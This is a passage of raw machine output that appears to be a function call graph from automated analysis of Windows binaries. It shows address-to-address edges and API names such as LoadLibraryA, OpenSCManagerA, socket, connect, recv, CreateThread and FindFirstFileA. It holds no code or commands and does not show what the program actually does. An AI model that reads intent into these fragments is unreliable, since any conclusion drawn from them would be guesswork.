7ffe1a521fea 59152->59154 59156 7ffe1a5277a2 6 API calls 59153->59156 59155 7ffe1a5277a2 6 API calls 59154->59155 59158 7ffe1a522004 59155->59158 59157 7ffe1a52202b 59156->59157 59159 7ffe1a5277a2 6 API calls 59157->59159 59158->58790 59159->59158 59161 7ffe1a52659b GetLastError 59160->59161 59162 7ffe1a52651d CreateThread 59160->59162 59164 7ffe1a5277a2 6 API calls 59161->59164 59163 7ffe1a526673 GetLastError 59162->59163 59171 7ffe1a526569 59162->59171 59166 7ffe1a5277a2 6 API calls 59163->59166 59170 7ffe1a526576 59164->59170 59165 7ffe1a52676c 59166->59171 59171->59165 59171->59170 59213 7ffe1a527432 GetLastError 59212->59213 59214 7ffe1a527428 59212->59214 59215 7ffe1a5277a2 6 API calls 59213->59215 59216 7ffe1a525dcb 59214->59216 59215->59214 59217 7ffe1a525e12 59216->59217 59218 7ffe1a525ddc 59216->59218 59221 7ffe1a5277a2 6 API calls 59217->59221 59219 7ffe1a525de1 59218->59219 59220 7ffe1a525e42 59218->59220 59223 7ffe1a525e72 59219->59223 59224 7ffe1a525dea 59219->59224 59222 7ffe1a5277a2 6 API calls 59220->59222 59227 7ffe1a525df7 59221->59227 59222->59227 59225 7ffe1a5277a2 6 API calls 59223->59225 59229 7ffe1a525c8c 8 API calls 59224->59229 59225->59227 59227->59091 59227->59092 59228 7ffe1a525def 59228->59227 59229->59228 59231 7ffe1a5283f1 59230->59231 59232 7ffe1a528429 59230->59232 59238 7ffe1a5280c9 59231->59238 59234 7ffe1a5277a2 6 API calls 59232->59234 59235 7ffe1a528408 59234->59235 59235->59112 59235->59114 59239 7ffe1a5280e1 59238->59239 59240 7ffe1a5280fc 59238->59240 59241 7ffe1a52812f 59239->59241 59242 7ffe1a5280e6 59239->59242 59243 7ffe1a5277a2 6 API calls 59240->59243 59245 7ffe1a5277a2 6 API calls 59241->59245 59244 7ffe1a528162 59242->59244 59248 7ffe1a5280eb 59242->59248 59250 7ffe1a528125 59243->59250 59246 7ffe1a5277a2 6 API calls 59244->59246 59245->59250 59246->59250 59247 7ffe1a5281cc 59247->59250 59248->59247 59251 7ffe1a5281a1 strcmp 59248->59251 59253 7ffe1a5277a2 6 API calls 59250->59253 59251->59248 59273 7ffe1a527742 LoadLibraryA 59272->59273 59274 7ffe1a52776b 59272->59274 59275 7ffe1a52776e GetLastError 59273->59275 59276 7ffe1a527750 59273->59276 59274->59275 59277 7ffe1a5277a2 6 API calls 59275->59277 59278 7ffe1a5277a2 6 API calls 59276->59278 59279 7ffe1a526e20 59277->59279 59278->59279 59416 7ffe126e224a 59415->59416 59417 7ffe126e2370 GetLastError 59415->59417 59521 7ffe126e4e20 GetModuleHandleExA 59416->59521 59418 7ffe126e2072 10 API calls 59417->59418 59425 7ffe126e2349 59418->59425 59423 7ffe126e2284 strlen 59426 7ffe126e229d 59423->59426 59427 7ffe126e22b3 59423->59427 59424 7ffe126e2072 10 API calls 59430 7ffe126e2366 59424->59430 59425->59424 59426->59427 59431 7ffe126e22a2 strlen 59426->59431 59428 7ffe126e22d8 strlen fopen 59427->59428 59429 7ffe126e22b8 strcat strlen 59427->59429 59432 7ffe126e243d 59428->59432 59433 7ffe126e2327 59428->59433 59429->59428 59430->58800 59439 7ffe126e1d84 59430->59439 59431->59427 59435 7ffe126e2072 10 API calls 59432->59435 59434 7ffe126e2072 10 API calls 59433->59434 59436 7ffe126e2341 59434->59436 59435->59425 59436->59425 59437 7ffe126e24ad 59436->59437 59438 7ffe126e2072 10 API calls 59437->59438 59438->59430 59440 7ffe126e1da6 59439->59440 59441 7ffe126e1de9 59439->59441 59539 7ffe126e19f0 59440->59539 59442 7ffe126e2072 10 API calls 59441->59442 59447 7ffe126e1dbf 59442->59447 59445 7ffe126e1e19 _errno _strtoui64 _errno 59446 7ffe126e1e4c _errno 59445->59446 59445->59447 59448 7ffe126e2072 10 API calls 59446->59448 59447->58802 59449 7ffe126e482c 59447->59449 59448->59447 59581 7ffe126e5154 59449->59581 59483 7ffe126e32aa 59482->59483 59484 7ffe126e32d2 59482->59484 59485 7ffe126e2072 10 API calls 59483->59485 59486 7ffe126e2072 10 API calls 59484->59486 59487 7ffe126e32c4 59485->59487 59488 7ffe126e32eb 59486->59488 59487->58806 59489 7ffe126e2072 10 API calls 59488->59489 59489->59487 59491 7ffe126e3c52 GetLastError 59490->59491 59492 7ffe126e3ad0 InitializeCriticalSectionAndSpinCount 59490->59492 59495 7ffe126e2072 10 API calls 59491->59495 59493 7ffe126e3afd 59492->59493 59494 7ffe126e3d6e GetLastError 59492->59494 59522 7ffe126e2266 59521->59522 59523 7ffe126e4e52 GetLastError 59521->59523 59525 7ffe126e859b 59522->59525 59524 7ffe126e2072 10 API calls 59523->59524 59524->59522 59526 7ffe126e85ac 59525->59526 59527 7ffe126e85e2 59525->59527 59529 7ffe126e8612 59526->59529 59530 7ffe126e85b1 59526->59530 59528 7ffe126e2072 10 API calls 59527->59528 59536 7ffe126e227a 59528->59536 59531 7ffe126e2072 10 API calls 59529->59531 59532 7ffe126e85ba 59530->59532 59533 7ffe126e8642 59530->59533 59531->59536 59538 7ffe126e845c 12 API calls 59532->59538 59534 7ffe126e2072 10 API calls 59533->59534 59534->59536 59536->59423 59536->59425 59537 7ffe126e85bf 59537->59536 59538->59537 59540 7ffe126e1a39 59539->59540 59541 7ffe126e1a01 59539->59541 59543 7ffe126e2072 10 API calls 59540->59543 59547 7ffe126e16d9 59541->59547 59545 7ffe126e1a18 59543->59545 59545->59445 59545->59447 59548 7ffe126e170c 59547->59548 59549 7ffe126e16f1 59547->59549 59552 7ffe126e2072 10 API calls 59548->59552 59550 7ffe126e16f6 59549->59550 59551 7ffe126e173f 59549->59551 59553 7ffe126e1772 59550->59553 59556 7ffe126e16fb 59550->59556 59554 7ffe126e2072 10 API calls 59551->59554 59558 7ffe126e1735 59552->59558 59555 7ffe126e2072 10 API calls 59553->59555 59554->59558 59555->59558 59557 7ffe126e17dc 59556->59557 59559 7ffe126e17b1 strcmp 59556->59559 59557->59558 59560 7ffe126e17e3 59557->59560 59561 7ffe126e2072 10 API calls 59558->59561 59559->59556 59563 7ffe126e17f9 59561->59563 59563->59545 59582 7ffe126e518b 59581->59582 59583 7ffe126e5162 LoadLibraryA 59581->59583 59584 7ffe126e518e GetLastError 59582->59584 59583->59584 59585 7ffe126e5170 59583->59585 59586 7ffe126e2072 10 API calls 59584->59586 59587 7ffe126e2072 10 API calls 59585->59587 59588 7ffe126e4840 59586->59588 59587->59588 59625 7ffe115042aa 59624->59625 59626 7ffe115043d0 GetLastError 59624->59626 59737 7ffe11502700 GetModuleHandleExA 59625->59737 59628 7ffe115040d2 10 API calls 59626->59628 59633 7ffe115043a9 59628->59633 59632 7ffe115042e4 strlen 59635 7ffe115042fd 59632->59635 59636 7ffe11504313 59632->59636 59634 7ffe115040d2 10 API calls 59633->59634 59647 7ffe115043c6 59634->59647 59635->59636 59639 7ffe11504302 strlen 59635->59639 59637 7ffe11504338 strlen fopen 59636->59637 59638 7ffe11504318 strcat strlen 59636->59638 59640 7ffe1150449d 59637->59640 59641 7ffe11504387 59637->59641 59638->59637 59639->59636 59643 7ffe115040d2 10 API calls 59640->59643 59642 7ffe115040d2 10 API calls 59641->59642 59644 7ffe115043a1 59642->59644 59643->59633 59644->59633 59645 7ffe1150450d 59644->59645 59647->58816 59648 7ffe115051c4 59647->59648 59649 7ffe11505229 59648->59649 59650 7ffe115051e6 59648->59650 59652 7ffe115040d2 10 API calls 59649->59652 59755 7ffe11504e30 59650->59755 59654 7ffe115051ff 59652->59654 59654->58822 59658 7ffe1150210c 59654->59658 59655 7ffe11505259 _errno _strtoui64 _errno 59655->59654 59656 7ffe1150528c _errno 59655->59656 59657 7ffe115040d2 10 API calls 59656->59657 59657->59654 59797 7ffe11502a34 59658->59797 59694 7ffe115062ca 59693->59694 59695 7ffe115062f2 59693->59695 59696 7ffe115040d2 10 API calls 59694->59696 59697 7ffe115040d2 10 API calls 59695->59697 59699 7ffe11505511 59696->59699 59698 7ffe1150630b 59697->59698 59700 7ffe115040d2 10 API calls 59698->59700 59699->58822 59701 7ffe11508f74 InitializeCriticalSectionAndSpinCount 59699->59701 59700->59699 59702 7ffe11508f8f 59701->59702 59703 7ffe11508fc4 GetLastError 59701->59703 59704 7ffe115040d2 10 API calls 59702->59704 59705 7ffe115040d2 10 API calls 59703->59705 59708 7ffe1150551a 59704->59708 59706 7ffe11508fe2 59705->59706 59707 7ffe115040d2 10 API calls 59706->59707 59707->59708 59708->58822 59709 7ffe115017f8 InitializeCriticalSectionAndSpinCount 59708->59709 59738 7ffe11502728 59737->59738 59739 7ffe11502732 GetLastError 59737->59739 59741 7ffe1150ce6b 59738->59741 59740 7ffe115040d2 10 API calls 59739->59740 59740->59738 59742 7ffe1150ceb2 59741->59742 59743 7ffe1150ce7c 59741->59743 59744 7ffe115040d2 10 API calls 59742->59744 59745 7ffe1150ce81 59743->59745 59746 7ffe1150cee2 59743->59746 59752 7ffe115042da 59744->59752 59748 7ffe1150cf12 59745->59748 59749 7ffe1150ce8a 59745->59749 59747 7ffe115040d2 10 API calls 59746->59747 59747->59752 59750 7ffe115040d2 10 API calls 59748->59750 59754 7ffe1150cd2c 12 API calls 59749->59754 59750->59752 59752->59632 59752->59633 59753 7ffe1150ce8f 59753->59752 59754->59753 59756 7ffe11504e79 59755->59756 59757 7ffe11504e41 59755->59757 59759 7ffe115040d2 10 API calls 59756->59759 59763 7ffe11504b19 59757->59763 59760 7ffe11504e58 59759->59760 59760->59654 59760->59655 59764 7ffe11504b4c 59763->59764 59765 7ffe11504b31 59763->59765 59768 7ffe115040d2 10 API calls 59764->59768 59766 7ffe11504b36 59765->59766 59767 7ffe11504b7f 59765->59767 59769 7ffe11504bb2 59766->59769 59772 7ffe11504b3b 59766->59772 59770 7ffe115040d2 10 API calls 59767->59770 59773 7ffe11504b75 59768->59773 59771 7ffe115040d2 10 API calls 59769->59771 59770->59773 59771->59773 59774 7ffe11504c1c 59772->59774 59775 7ffe11504bf1 strcmp 59772->59775 59777 7ffe115040d2 10 API calls 59773->59777 59774->59773 59775->59772 59779 7ffe11504c39 59777->59779 59779->59760 59798 7ffe11502a6b 59797->59798 59799 7ffe11502a42 LoadLibraryA 59797->59799 59801 7ffe11502a6e GetLastError 59798->59801 59800 7ffe11502a50 59799->59800 59799->59801 59802 7ffe115040d2 10 API calls 59800->59802 59803 7ffe115040d2 10 API calls 59801->59803 59804 7ffe11502120 59802->59804 59803->59804 59841 7ffe11bdca2a 59840->59841 59842 7ffe11bdcb50 GetLastError 59840->59842 59965 7ffe11bdb930 GetModuleHandleExA 59841->59965 59844 7ffe11bdc852 6 API calls 59842->59844 59846 7ffe11bdcb29 59844->59846 59852 7ffe11bdc852 6 API calls 59846->59852 59849 7ffe11bdca64 strlen 59850 7ffe11bdca7d 59849->59850 59851 7ffe11bdca93 59849->59851 59850->59851 59853 7ffe11bdca82 strlen 59850->59853 59854 7ffe11bdcab8 strlen fopen 59851->59854 59855 7ffe11bdca98 strcat strlen 59851->59855 59856 7ffe11bdcb46 59852->59856 59853->59851 59857 7ffe11bdcc1d 59854->59857 59858 7ffe11bdcb07 59854->59858 59855->59854 59856->58826 59864 7ffe11bdd824 59856->59864 59859 7ffe11bdc852 6 API calls 59857->59859 59982 7ffe11bdc852 59858->59982 59859->59846 59865 7ffe11bdd846 59864->59865 59866 7ffe11bdd889 59864->59866 60002 7ffe11bdd490 59865->60002 59867 7ffe11bdc852 6 API calls 59866->59867 59870 7ffe11bdd85f 59867->59870 59870->58839 59874 7ffe11bdc25c 59870->59874 59871 7ffe11bdd8b9 _errno _strtoui64 _errno 59871->59870 59872 7ffe11bdd8ec _errno 59871->59872 59873 7ffe11bdc852 6 API calls 59872->59873 59873->59870 60044 7ffe11bdbc64 59874->60044 59910 7ffe11bd8be6 GetLastError 59909->59910 59911 7ffe11bd8b7e OpenSCManagerA 59909->59911 59914 7ffe11bdc852 6 API calls 59910->59914 59912 7ffe11bd8bb4 59911->59912 59913 7ffe11bd8cbe GetLastError 59911->59913 59916 7ffe11bd8cda 59912->59916 59920 7ffe11bd8bc1 59912->59920 59915 7ffe11bdc852 6 API calls 59913->59915 59914->59920 59915->59916 59917 7ffe11bdc852 6 API calls 59916->59917 59919 7ffe11bd8bde 59917->59919 59918 7ffe11bdc852 6 API calls 59918->59919 59919->58839 59921 7ffe11bdb87e WSAStartup 59919->59921 59920->59918 59922 7ffe11bdb89a 59921->59922 59923 7ffe11bdb8c2 59921->59923 59925 7ffe11bdc852 6 API calls 59922->59925 59924 7ffe11bdc852 6 API calls 59923->59924 59966 7ffe11bdb958 59965->59966 59967 7ffe11bdb962 GetLastError 59965->59967 59969 7ffe11bd466b 59966->59969 59968 7ffe11bdc852 6 API calls 59967->59968 59968->59966 59970 7ffe11bd467c 59969->59970 59971 7ffe11bd46b2 59969->59971 59973 7ffe11bd46e2 59970->59973 59974 7ffe11bd4681 59970->59974 59972 7ffe11bdc852 6 API calls 59971->59972 59980 7ffe11bd4697 59972->59980 59975 7ffe11bdc852 6 API calls 59973->59975 59976 7ffe11bd468a 59974->59976 59977 7ffe11bd4712 59974->59977 59975->59980 59993 7ffe11bd452c 8 API calls 59976->59993 59978 7ffe11bdc852 6 API calls 59977->59978 59978->59980 59980->59846 59980->59849 59981 7ffe11bd468f 59981->59980 59983 7ffe11bdc860 59982->59983 59994 7ffe11be0ac0 59983->59994 59993->59981 59995 7ffe11be0ae5 59994->59995 59996 7ffe11be0ace 59994->59996 60003 7ffe11bdd4d9 60002->60003 60004 7ffe11bdd4a1 60002->60004 60005 7ffe11bdc852 6 API calls 60003->60005 60010 7ffe11bdd179 60004->60010 60007 7ffe11bdd4b8 60005->60007 60007->59870 60007->59871 60011 7ffe11bdd1ac 60010->60011 60012 7ffe11bdd191 60010->60012 60015 7ffe11bdc852 6 API calls 60011->60015 60013 7ffe11bdd196 60012->60013 60014 7ffe11bdd1df 60012->60014 60016 7ffe11bdd212 60013->60016 60023 7ffe11bdd19b 60013->60023 60017 7ffe11bdc852 6 API calls 60014->60017 60021 7ffe11bdd1d5 60015->60021 60018 7ffe11bdc852 6 API calls 60016->60018 60017->60021 60018->60021 60019 7ffe11bdd27c 60019->60021 60025 7ffe11bdc852 6 API calls 60021->60025 60022 7ffe11bdd251 strcmp 60022->60023 60023->60019 60023->60022 60045 7ffe11bdbc9b 60044->60045 60046 7ffe11bdbc72 LoadLibraryA 60044->60046 60047 7ffe11bdbc9e GetLastError 60045->60047 60046->60047 60048 7ffe11bdbc80 60046->60048 60050 7ffe11bdc852 6 API calls 60047->60050 60049 7ffe11bdc852 6 API calls 60048->60049 60051 7ffe11bdbc99 60049->60051 60050->60051 60088 7ffe1a4f152a 60087->60088 60089 7ffe1a4f1650 GetLastError 60087->60089 60192 7ffe1a4f3a80 GetModuleHandleExA 60088->60192 60090 7ffe1a4f1352 12 API calls 60089->60090 60099 7ffe1a4f1629 60090->60099 60095 7ffe1a4f1564 strlen 60096 7ffe1a4f157d 60095->60096 60097 7ffe1a4f1593 60095->60097 60096->60097 60100 7ffe1a4f1582 strlen 60096->60100 60102 7ffe1a4f15b8 strlen fopen 60097->60102 60103 7ffe1a4f1598 strcat strlen 60097->60103 60098 7ffe1a4f1352 12 API calls 60101 7ffe1a4f12a2 60098->60101 60099->60098 60100->60097 60101->58843 60111 7ffe1a4f2324 60101->60111 60104 7ffe1a4f171d 60102->60104 60105 7ffe1a4f1607 60102->60105 60103->60102 60107 7ffe1a4f1352 12 API calls 60104->60107 60106 7ffe1a4f1352 12 API calls 60105->60106 60108 7ffe1a4f1621 60106->60108 60107->60099 60108->60099 60109 7ffe1a4f178d 60108->60109 60110 7ffe1a4f1352 12 API calls 60109->60110 60110->60101 60112 7ffe1a4f2389 60111->60112 60113 7ffe1a4f2346 60111->60113 60115 7ffe1a4f1352 12 API calls 60112->60115 60210 7ffe1a4f1f90 60113->60210 60118 7ffe1a4f12e1 60115->60118 60117 7ffe1a4f23b9 _errno _strtoui64 _errno 60117->60118 60119 7ffe1a4f23ec _errno 60117->60119 60118->58844 60121 7ffe1a4f348c 60118->60121 60120 7ffe1a4f1352 12 API calls 60119->60120 60120->60118 60252 7ffe1a4f3db4 60121->60252 60157 7ffe1a4f4b7a 60156->60157 60158 7ffe1a4f4ba2 60156->60158 60160 7ffe1a4f1352 12 API calls 60157->60160 60159 7ffe1a4f1352 12 API calls 60158->60159 60161 7ffe1a4f4bbb 60159->60161 60162 7ffe1a4f4b94 60160->60162 60163 7ffe1a4f1352 12 API calls 60161->60163 60162->58849 60163->60162 60165 7ffe1a4f2b9d CreateThread 60164->60165 60166 7ffe1a4f2c1b GetLastError 60164->60166 60167 7ffe1a4f2be9 60165->60167 60168 7ffe1a4f2cf3 GetLastError 60165->60168 60169 7ffe1a4f1352 12 API calls 60166->60169 60171 7ffe1a4f2dec 60167->60171 60172 7ffe1a4f2bf6 60167->60172 60170 7ffe1a4f1352 12 API calls 60168->60170 60169->60172 60170->60172 60193 7ffe1a4f1546 60192->60193 60194 7ffe1a4f3ab2 GetLastError 60192->60194 60196 7ffe1a4f7feb 60193->60196 60195 7ffe1a4f1352 12 API calls 60194->60195 60195->60193 60197 7ffe1a4f7ffc 60196->60197 60198 7ffe1a4f8032 60196->60198 60200 7ffe1a4f8062 60197->60200 60201 7ffe1a4f8001 60197->60201 60199 7ffe1a4f1352 12 API calls 60198->60199 60207 7ffe1a4f155a 60199->60207 60202 7ffe1a4f1352 12 API calls 60200->60202 60203 7ffe1a4f800a 60201->60203 60204 7ffe1a4f8092 60201->60204 60202->60207 60209 7ffe1a4f7eac 14 API calls 60203->60209 60205 7ffe1a4f1352 12 API calls 60204->60205 60205->60207 60207->60095 60207->60099 60208 7ffe1a4f800f 60208->60207 60209->60208 60211 7ffe1a4f1fd9 60210->60211 60212 7ffe1a4f1fa1 60210->60212 60214 7ffe1a4f1352 12 API calls 60211->60214 60218 7ffe1a4f1c79 60212->60218 60216 7ffe1a4f1fb8 60214->60216 60216->60117 60216->60118 60219 7ffe1a4f1cac 60218->60219 60220 7ffe1a4f1c91 60218->60220 60223 7ffe1a4f1352 12 API calls 60219->60223 60221 7ffe1a4f1c96 60220->60221 60222 7ffe1a4f1cdf 60220->60222 60224 7ffe1a4f1d12 60221->60224 60232 7ffe1a4f1c9b 60221->60232 60225 7ffe1a4f1352 12 API calls 60222->60225 60228 7ffe1a4f1cd5 60223->60228 60226 7ffe1a4f1352 12 API calls 60224->60226 60225->60228 60226->60228 60227 7ffe1a4f1d7c 60227->60228 60230 7ffe1a4f1d83 60227->60230 60231 7ffe1a4f1352 12 API calls 60228->60231 60229 7ffe1a4f1d51 strcmp 60229->60232 60234 7ffe1a4f1d99 60231->60234 60232->60227 60232->60229 60234->60216 60253 7ffe1a4f3deb 60252->60253 60254 7ffe1a4f3dc2 LoadLibraryA 60252->60254 60256 7ffe1a4f3dee GetLastError 60253->60256 60255 7ffe1a4f3dd0 60254->60255 60254->60256 60257 7ffe1a4f1352 12 API calls 60255->60257 60258 7ffe1a4f1352 12 API calls 60256->60258 60296 7ff7c1abaa85 60295->60296 60297 7ff7c1abaa6e 60295->60297 60302 7ff7c1abbac0 fputc 60296->60302 60301 7ff7c1abbac0 fputc 60297->60301 60300 7ff7c1ab2f59 60300->58314 60300->58315 60300->58316 60301->60300 60302->60300 60303 7ffe11ec135a 60312 7ffe11ec1365 60303->60312 60304 7ffe11ec146e 60305 7ffe11ec147b 60304->60305 60370 7ffe11ec1e65 10 API calls 60304->60370 60307 7ffe11ec138d Sleep 60307->60312 60310 7ffe11ec1442 Sleep 60310->60312 60311 7ffe11ec1e65 10 API calls 60311->60312 60312->60304 60312->60307 60312->60310 60312->60311 60314 7ffe11ec142e memcpy 60312->60314 60315 7ffe11ec20fc socket 60312->60315 60350 7ffe11ec25aa 60312->60350 60361 7ffe11ec1290 60312->60361 60314->60312 60316 7ffe11ec22fb WSAGetLastError 60315->60316 60317 7ffe11ec2133 60315->60317 60320 7ffe11ec9dc2 6 API calls 60316->60320 60318 7ffe11ec2137 60317->60318 60319 7ffe11ec2155 60317->60319 60371 7ffe11ec1d99 60318->60371 60323 7ffe11ec1d99 8 API calls 60319->60323 60322 7ffe11ec231f 60320->60322 60325 7ffe11ec2329 60322->60325 60326 7ffe11ec216f 60322->60326 60327 7ffe11ec2153 60323->60327 60330 7ffe11ec9dc2 6 API calls 60325->60330 60328 7ffe11ec9dc2 6 API calls 60326->60328 60331 7ffe11ec2167 60327->60331 60384 7ffe11ec1eca setsockopt 60327->60384 60332 7ffe11ec2190 60328->60332 60329 7ffe11ec21ae 60329->60331 60334 7ffe11ec21b3 htonl htons connect 60329->60334 60330->60332 60388 7ffe11ec1e65 10 API calls 60331->60388 60332->60312 60337 7ffe11ec220c WSAGetLastError 60334->60337 60338 7ffe11ec21f1 60334->60338 60340 7ffe11ec221d 60337->60340 60341 7ffe11ec22ce WSAGetLastError 60337->60341 60339 7ffe11ec1d99 8 API calls 60338->60339 60343 7ffe11ec21fe 60339->60343 60340->60331 60344 7ffe11ec2225 select 60340->60344 60342 7ffe11ec9dc2 6 API calls 60341->60342 60342->60331 60343->60322 60343->60331 60345 7ffe11ec2286 60344->60345 60346 7ffe11ec22b0 60344->60346 60345->60338 60347 7ffe11ec228c WSAGetLastError 60345->60347 60348 7ffe11ec9dc2 6 API calls 60346->60348 60349 7ffe11ec9dc2 6 API calls 60347->60349 60348->60331 60349->60331 60351 7ffe11ec2638 60350->60351 60352 7ffe11ec25c4 60350->60352 60354 7ffe11ec9dc2 6 API calls 60351->60354 60352->60351 60353 7ffe11ec25c9 recv 60352->60353 60355 7ffe11ec25ec WSAGetLastError 60353->60355 60356 7ffe11ec25df 60353->60356 60357 7ffe11ec25e3 60354->60357 60355->60357 60358 7ffe11ec2600 60355->60358 60356->60357 60360 7ffe11ec9dc2 6 API calls 60356->60360 60357->60312 60359 7ffe11ec9dc2 6 API calls 60358->60359 60359->60357 60360->60357 60362 7ffe11ec1352 60361->60362 60363 7ffe11ec12a8 60361->60363 60362->60312 60363->60362 60389 7ffe11ec8e15 60363->60389 60366 7ffe11ec1344 LeaveCriticalSection 60366->60362 60367 7ffe11ec12d8 60367->60366 60368 7ffe11ec9dc2 6 API calls 60367->60368 60392 7ffe11ec9d36 60367->60392 60368->60367 60370->60305 60372 7ffe11ec1da9 ioctlsocket 60371->60372 60374 7ffe11ec1ddd WSAGetLastError 60372->60374 60375 7ffe11ec1dcc 60372->60375 60376 7ffe11ec9dc2 6 API calls 60374->60376 60375->60329 60377 7ffe11ec1ce4 setsockopt 60375->60377 60376->60375 60378 7ffe11ec1d19 setsockopt 60377->60378 60379 7ffe11ec1d74 WSAGetLastError 60377->60379 60381 7ffe11ec1d4f WSAGetLastError 60378->60381 60382 7ffe11ec1d45 60378->60382 60380 7ffe11ec9dc2 6 API calls 60379->60380 60380->60382 60383 7ffe11ec9dc2 6 API calls 60381->60383 60382->60327 60383->60382 60385 7ffe11ec1f07 60384->60385 60386 7ffe11ec1f11 WSAGetLastError 60384->60386 60385->60329 60387 7ffe11ec9dc2 6 API calls 60386->60387 60387->60385 60388->60326 60390 7ffe11ec8e2b GetSystemTimeAsFileTime 60389->60390 60391 7ffe11ec12bb EnterCriticalSection 60389->60391 60390->60391 60391->60367 60393 7ffe11ec9d62 60392->60393 60403 7ffe11ec9d81 60392->60403 60394 7ffe11ec9d6c 60393->60394 60395 7ffe11ec9d9f 60393->60395 60397 7ffe11ec9d8a 60394->60397 60398 7ffe11ec9d6e 60394->60398 60411 7ffe11ec99b3 23 API calls 60395->60411 60397->60403 60406 7ffe11ec9752 60397->60406 60399 7ffe11ec9d98 60398->60399 60402 7ffe11ec9d75 60398->60402 60410 7ffe11ec9760 25 API calls 60399->60410 60402->60403 60409 7ffe11ec9add 45 API calls 60402->60409 60403->60367 60404 7ffe11ec9d9d 60404->60403 60412 7ffe11ec9510 60406->60412 60409->60403 60410->60404 60411->60403 60441 7ffe11ec3f5b 60412->60441 60415 7ffe11ec4ac0 8 API calls 60416 7ffe11ec9586 60415->60416 60417 7ffe11ec89db 8 API calls 60416->60417 60418 7ffe11ec9598 60417->60418 60419 7ffe11ec95a2 strlen 60418->60419 60438 7ffe11ec9699 60418->60438 60420 7ffe11ec95b9 60419->60420 60421 7ffe11ec95cf strlen 60419->60421 60420->60421 60423 7ffe11ec95be strlen 60420->60423 60444 7ffe11ec82d7 60421->60444 60423->60421 60425 7ffe11ec9601 60427 7ffe11ec9609 strlen 60425->60427 60435 7ffe11ec9537 60425->60435 60431 7ffe11ec9636 strcpy strlen strlen strlen 60427->60431 60432 7ffe11ec9620 60427->60432 60430 7ffe11ec9727 60430->60435 60436 7ffe11ec3f5b 2 API calls 60430->60436 60431->60438 60432->60431 60434 7ffe11ec9625 strlen 60432->60434 60433 7ffe11ec971b 60500 7ffe11ec5bd8 FindClose 60433->60500 60434->60431 60435->60403 60436->60435 60438->60433 60438->60435 60472 7ffe11ec5bf3 60438->60472 60497 7ffe11ec542f 38 API calls 60438->60497 60498 7ffe11ec4e60 20 API calls 60438->60498 60499 7ffe11ec4fe9 66 API calls 60438->60499 60442 7ffe11ec3f66 60441->60442 60443 7ffe11ec3f71 QueryPerformanceFrequency QueryPerformanceCounter 60441->60443 60442->60415 60442->60435 60443->60442 60445 7ffe11ec82f5 60444->60445 60446 7ffe11ec82e0 GetFileAttributesA 60444->60446 60448 7ffe11ec9dc2 6 API calls 60445->60448 60447 7ffe11ec8325 GetLastError 60446->60447 60449 7ffe11ec82eb 60446->60449 60447->60449 60448->60449 60449->60425 60450 7ffe11ec5e9e 60449->60450 60451 7ffe11ec5ef8 60450->60451 60452 7ffe11ec5ebd strlen 60450->60452 60454 7ffe11ec9dc2 6 API calls 60451->60454 60453 7ffe11ec5ece 60452->60453 60467 7ffe11ec5ee9 60452->60467 60455 7ffe11ec5ed7 CreateDirectoryA 60453->60455 60456 7ffe11ec5f76 strcpy strlen 60453->60456 60454->60467 60459 7ffe11ec5f30 GetLastError 60455->60459 60455->60467 60457 7ffe11ec5f55 60456->60457 60458 7ffe11ec5fae strlen 60456->60458 60457->60456 60457->60458 60463 7ffe11ec5f9d strlen 60457->60463 60457->60467 60468 7ffe11ec601a CreateDirectoryA 60457->60468 60458->60457 60460 7ffe11ec9dc2 6 API calls 60459->60460 60460->60457 60461 7ffe11ec60e9 60466 7ffe11ec9dc2 6 API calls 60461->60466 60462 7ffe11ec6160 60464 7ffe11ec9dc2 6 API calls 60462->60464 60463->60458 60465 7ffe11ec6112 60464->60465 60465->60425 60466->60465 60467->60461 60467->60462 60469 7ffe11ec6031 GetLastError 60468->60469 60470 7ffe11ec5fc5 60468->60470 60469->60470 60470->60457 60471 7ffe11ec9dc2 6 API calls 60470->60471 60471->60470 60473 7ffe11ec5c59 60472->60473 60474 7ffe11ec5c13 60472->60474 60475 7ffe11ec9dc2 6 API calls 60473->60475 60496 7ffe11ec5ca3 60473->60496 60476 7ffe11ec5c1c 60474->60476 60477 7ffe11ec5cb2 60474->60477 60475->60496 60479 7ffe11ec5cea 60476->60479 60480 7ffe11ec5c25 60476->60480 60478 7ffe11ec9dc2 6 API calls 60477->60478 60478->60496 60481 7ffe11ec9dc2 6 API calls 60479->60481 60482 7ffe11ec5c31 FindNextFileA 60480->60482 60483 7ffe11ec5d22 FindFirstFileA 60480->60483 60481->60496 60484 7ffe11ec5c47 60482->60484 60485 7ffe11ec5d72 GetLastError 60482->60485 60486 7ffe11ec5d36 60483->60486 60487 7ffe11ec5d43 GetLastError 60483->60487 60490 7ffe11ec5c4c strcpy 60484->60490 60488 7ffe11ec5d9b 60485->60488 60489 7ffe11ec5d50 60485->60489 60486->60490 60487->60489 60491 7ffe11ec5d57 60487->60491 60494 7ffe11ec9dc2 6 API calls 60488->60494 60489->60473 60493 7ffe11ec5d8d FindClose 60489->60493 60495 7ffe11ec5db8 60489->60495 60490->60473 60492 7ffe11ec9dc2 6 API calls 60491->60492 60492->60489 60493->60473 60494->60489 60495->60438 60496->60438 60497->60438 60498->60438 60499->60438 60500->60430 60501 7ffe126e3553 60519 7ffe126e3563 60501->60519 60502 7ffe126e376e 60506 7ffe126e3774 60502->60506 60581 7ffe126e2785 14 API calls 60502->60581 60507 7ffe126e3593 Sleep 60507->60519 60508 7ffe126e2072 10 API calls 60508->60519 60511 7ffe126e2785 14 API calls 60511->60519 60513 7ffe126e363e GetProcessHeap HeapAlloc 60514 7ffe126e3664 CreateThread 60513->60514 60513->60519 60515 7ffe126e36a3 EnterCriticalSection 60514->60515 60516 7ffe126e3721 GetLastError 60514->60516 60518 7ffe126e36c3 LeaveCriticalSection 60515->60518 60517 7ffe126e2072 10 API calls 60516->60517 60517->60519 60521 7ffe126e2072 10 API calls 60518->60521 60519->60502 60519->60507 60519->60508 60519->60511 60519->60513 60522 7ffe126e3752 GetProcessHeap HeapFree 60519->60522 60523 7ffe126e28ba socket 60519->60523 60541 7ffe126e26b9 60519->60541 60547 7ffe126e2604 setsockopt 60519->60547 60554 7ffe126e2c99 60519->60554 60577 7ffe126e27ea setsockopt 60519->60577 60521->60519 60522->60519 60524 7ffe126e28eb 60523->60524 60525 7ffe126e29c2 WSAGetLastError 60523->60525 60527 7ffe126e27ea 12 API calls 60524->60527 60526 7ffe126e2072 10 API calls 60525->60526 60528 7ffe126e29e6 60526->60528 60529 7ffe126e28f8 60527->60529 60530 7ffe126e29b9 60528->60530 60534 7ffe126e2072 10 API calls 60528->60534 60531 7ffe126e29b1 60529->60531 60532 7ffe126e2901 htonl htons bind 60529->60532 60530->60519 60582 7ffe126e2785 14 API calls 60531->60582 